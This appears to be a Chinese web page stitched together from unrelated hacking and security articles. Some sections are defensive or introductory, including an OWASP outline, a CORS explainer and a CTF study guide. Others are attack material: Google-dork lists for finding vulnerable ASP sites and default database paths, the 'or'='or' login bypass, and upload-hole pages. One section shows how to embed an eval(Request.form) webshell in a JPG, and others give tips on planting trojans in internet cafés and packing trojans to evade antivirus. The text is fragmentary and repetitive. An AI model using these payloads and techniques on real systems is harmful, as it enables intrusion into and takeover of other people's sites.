漏洞挖掘

摘要： 0x00 索引说明 6.30在OWASP的分享，关于业务安全的漏洞检测模型。进一步的延伸科普。 0x01 身份认证安全 1 暴力破解 在没有验证码限制或者一次验证码可以多次使用的地方，使用已知用户对密码进行暴力破解或者用一个通用密码对用户进行暴力破解。 简单的验证码爆破。URL: http:/... 0x00 索引说明 6.30在OWASP的分享，关于业务安全的漏洞检测模型。进一步的延伸科普。 0x01 身份认证安全 1 暴力破解 在没有验证码限制或者一次验证码可以多次使用的地方，使用已知用户对密码进行暴力破解或者用一个通用密码对用户进行暴力破解。 简单的验证码爆破。URL: http://zone.wooyun.org/content/20839 一些工具及脚本 Burpsuite htpwdScan 撞库爆破必备 URL: https://github.com/lijiejie/htpwdScan hydra 源码安装xhydra支持更多的协议去爆破 (可破WEB，其他协议不属于业务安全的范畴) 2 session & cookie类 会话固定攻击：利用服务器的session不变机制，借他人之手获得认证和授权，冒充他人。案例： WooYun: 新浪广东美食后台验证逻辑漏洞，直接登录后台，566764名用户资料暴露！ Cookie仿冒

网络安全是当前一个非常热门的话题，网络泄密、系统瘫痪、斯诺登事件......都在不断挑战所有人互联网人的神经。大家都在担忧自己的隐私会不会被泄露出去，公司的敏感信息怎么来保护。当然，这也是一个非常好的现象，说明现在大家的安全意识已经越来越高了！ 但是，也有一些不好的现象，比如很多公司的管理层认为，网络安全是大公司才需要考虑的事情，小型的创业公司并没有什么价值吸引黑客来攻击。在笔者看来，这种想法是非常危险的，任何一点点疏漏都可能给企业带来「灭顶之灾」 。但是，很多小公司受限于技术水平，又很难应对网络攻击。本文就来介绍中小企业该如何准备和应对网络攻击，避免自己的信息泄露和财产损失： 为什么黑客要攻击中小企业呢？ 诚然，对黑客来说攻克大公司的网络绝对是名利双收的事情：拿到非常多有价值的东西，能够上新闻头条。但是大公司的安全防范和追踪能力都是非常高的，对黑客而已，成本和风险也都随之提高。对于中小企业，安全防范比大公司要低多了，同时有价值的东西也绝对比个人要高非常多。 所以中小企业绝对是黑客最理想的目标和「点心」。 另外一点，就是中小企业安全防范意识比较差，黑客也非常清楚这一点，研究证明：97%的中小企业在将来的业务发展中不重视网络安全，82%的中小企业认为他们没有什么有价值的东西值得黑客来攻击，只有23%的中小企业人他们担心自己的信息被偷窃。 数据还是有点「触目惊心」的，对于特别小的企业

天前 谷歌地址 https://g.alexyang.me/ 到GoogLe,搜索一些关键字,edit.asp?韩国肉鸡为多,多数为MSSQL数据库! 2,到Google,site:cq.cninurl:asp 3, 利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用'or'='or'来登陆 4,这个应该N多人都搞过吧。。 关键字：CoNetMIBVer1.0网站后台管理系统 帐号密码为'or'='or' 5.动感购物系统呵呵。想到了明小子 inurl:help.asp登陆，如未注册成为会员! upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞 6。默认数据库地址blogdata/acblog.asa 关键字：acblog 7. 百度/htdocs 注册里可以直接上传asa文件！ 8. /Database/#newasp.mdb 关键词：NewAspSiteManageSystemVersion 9. 用挖掘机 关键字：PoweredbyWebBOY 页面：/upfile.asp 这个。。。。。。。不用说了。--！ 10. baidu中搜索关键字Ver5.0Build0519 (存在上传漏洞) 11. Upfile_Article.aspbbs/upfile.asp

... 8./Database/#newasp.mdb 关键词：NewAsp SiteManageSystem Version 9.用挖掘机 关键字：Powered by WEBBOY 页面：/upfile.asp 10.baidu中搜索关键字Ver5.0 Build 0519 (存在上传漏洞) 11.Upfile_Article.asp bbs/upfile.asp 输入关键字：powered by mypower ， 12.inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站 13.现在GOOGLE搜索关键字 intitle:网站小助手　inurl:asp 14.键字： 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛 挖掘鸡的关键字 添 setup.asp 15.VBulletin论坛的数据库 默认数据库地址! /includes/functions.php 工具: 1.网站猎手 下载地址:百度 Google! 2.Google 关键字: Powered by: vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by: vBulletin Version 3.0.3 其中一个就可以了

最近斗哥在学习CORS的漏洞和相关的一些知识梳理，网站如果存在这个漏洞就会有用户敏感数据被窃取的风险。 0x00 从浏览器的同源策略说起 SOP，同源策略 (Same Origin Policy) ，该策略是浏览器的一个安全基石，如果没有同源策略，那么，你打开了一个合法网站，又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源，没有任何限制。 (图片来自网络) 浏览器的同源策略规定：不同域的客户端脚本在没有明确授权的情况下，不能读写对方的资源。那么何为同源呢，即两个站点需要满足同协议，同域名，同端口这三个条件。 SOP是一个很好的策略，但是随着Web应用的发展，网站由于自身业务的需求，需要实现一些跨域的功能，能够让不同域的页面之间能够相互访问各自页面的内容。 CORS，跨域资源共享（Cross-origin resource sharing） ，是H5提供的一种机制，WEB应用程序可以通过在HTTP增加字段来告诉浏览器，哪些不同来源的服务器是有权访问本站资源的，当不同域的请求发生时，就出现了跨域的现象。 0x01 跨域访问的一些场景： 1.比如后端开发完一部分业务代码后，提供接口给前端用，在前后端分离的模式下，前后端的域名是不一致的，此时就会发生跨域访问的问题。 2.程序员在本地做开发，本地的文件夹并不是在一个域下面，当一个文件需要发送ajax请求

建一个asp文件，内容为 <!--＃i nclude file="ating.jpg"--> 找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索%和％,将其变为00,(不要替换自己asp的),再把jpg文件开头加入 <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT> 2. 名称：整蛊网吧 先用精锐网吧辅助工具得到用户名和密码，然后用计算机管理联结一台机器，开telnet,连接，开共享，复制一个木马过去运行即可。 3．名称：感受MD5暴力破解的魅力 rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all" 1和7代表密码最小和最大长度 阿汀我再加个方法：http://md5.rednoize.com/ 在线破解 或者到http://www.md5lookup.com/?category=01-3&searck=on 4.很多时候我们做免杀木马，不用懂汇编，用北斗加壳程序就能逃杀，还有很多加壳软件，大家木马加壳的时候最好多选择不知名的加壳软件。 5．名称：隐蔽的插入型ASP木马 (1)在我们要做手脚的asp文件里加入如下内容 <%if

*文章来源： https://blog.egsec.cn/archives/402 写在前面： 本片文章是写给社团中学习网络安全的同学的一点指导性文章，大家众所周知，我们学校并没有网络安全这门专业，所有的学习将是完全靠大家自学，社团建立网络安全战队就是为了力所能及的给大家提供最好的资源，帮助大家。本片文章内容只是我的个人观点，并不全面，本人也是一个刚入门的CTF练习生，所有的东西也是自学，并不全面，没有系统化学习过，更多资源还需靠自己查找。祝愿各位打算从事网安事业的同学加油！理论是枯燥的，但所有的实践需要理论去支撑！ 对于刚刚涉足安全界的同学来说，在没有老师带领的情况下，在如何学习网络安全上充满了迷茫，网络安全是一个综合性学科，涉及领域非常广，常指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭受到破坏、更改、泄露，系统连续可靠正常地运行，网络服务不中断。 网络安全包含网络设备安全、网络信息安全、网络软件安全。从广义来说，凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。网络安全是一门涉及计算机科学、网络技术、通信技术、密码技术、信息安全技术、应用数学、数论、信息论等多种学科的综合性学科。 这么多内容，对于一个刚入门的小白来说，刚开始摸不着头脑，所以，我根据自己的学习、工作以及实践经验列出了我的学习方法

1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 　　2.到Google ,site:cq.cn inurl:asp 　　3.利用挖掘鸡和一个ASP木马. 　　文件名是login.asp 　　路径组是/manage/ 　　关键词是went.asp 　　用'or'='or'来登陆 　　4.关键字：Co Net MIB Ver 1.0网站后台管理系统 　　帐号密码为 'or'='or' 　　5.动感购物系统 　　inurl:help.asp登陆，如未注册成为会员! 　　upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞 　　6.默认数据库地址blogdata/acblog.asa 　　关键字：acblog 　　7.百度 /htdocs 　　注册里可以直接上传asa文件！ 　　8./Database/#newasp.mdb 　　关键词：NewAsp SiteManageSystem Version 　　9.用挖掘机 　　关键字：Powered by WEBBOY 　　页面：/upfile.asp 　　10.baidu中搜索关键字Ver5.0 Build 0519 　　(存在上传漏洞) 　　11.Upfile_Article.asp bbs/upfile.asp 　　输入关键字：powered

信息收集 服务器的相关信息（真实ip，系统类型，版本，开放端口，WAF等） 网站指纹识别（包括，cms，cdn，证书等），dns记录 whois信息，姓名，备案，邮箱，电话反查（邮箱丢社工库，社工准备等） 子域名收集，旁站，C段等 google hacking针对化搜索，pdf文件，中间件版本，弱口令扫描等 扫描网站目录结构，爆后台，网站banner，测试文件，备份等敏感文件泄漏等 传输协议，通用漏洞，exp，github源码等 漏洞挖掘 浏览网站，看看网站规模，功能，特点等 端口，弱口令，目录等扫描,对响应的端口进行漏洞探测，比如 rsync,心脏出血，mysql,ftp,ssh弱口令等。 XSS，SQL注入，上传，命令注入，CSRF，cookie安全检测，敏感信息，通信数据传输，暴力破解，任意文件上传，越权访问，未授权访问，目录遍历，文件 包含，重放攻击（短信轰炸），服务器漏洞检测，最后使用漏扫工具等 漏洞利用 | 权限提升 mysql提权，serv-u提权，oracle提权 windows 溢出提权 linux脏牛,内核漏洞提权e 清除测试数据 | 输出报告 日志、测试数据的清理 总结，输出渗透测试报告，附修复方案 复测 验证并发现是否有新漏洞，输出报告，归档 问题 在渗透过程中，收集目标站注册人邮箱对我们有什么价值？ 丢社工库里看看有没有泄露密码

信息收集是指通过各种方式获取所需的信息。信息收集是信息得以利用的第一步，也是关键的一步。—百度百科 信息收集是指黑客为了更加有效地实施渗透攻击而在攻击前或攻击过程中对目标的所有探测活动。 背景： 不论曾经作为白帽子、安全服务工程师还是现在作为甲方安全工程师，都明白信息收集这项工作的重要性。目前网络上关于信息收集的文章数不胜数，那么为什么还要老生常谈？主要是目前网络上的文章更多是站在白帽子或者攻击者的视角下进行展开讨论，但甲方做信息收集的话题没有被提及，本文抛砖引玉，希望更多大佬提出意见。其实是对自己曾经做过的信息收集内容进行一个总结。 本文通过两个角度来讨论信息收集：攻击方、防守方，它们二者之间在信息收集方向的关系如下图： 不论是攻击方还是防守方做信息收集工作主要是四种方法： 社会工程： Google Hacking(不一定是Google)； 社交软件(微信、QQ、朋友圈等等)； site:example.com site:example.com 登录 site:example.com login 花式工具：各种扫描器与漏洞利用工具、爬虫； 奇葩技巧：这个主意是靠经验的积累与多看看大佬的文章； 手工：坚持+耐心 攻击方视角下的信息收集 网络上关于攻击方做信息收集的工具、方法都有了很不错的文章，大家搜索"信息收集"关键字就可以获取。攻击方做信息收集讨论两个问题：为什么做信息收集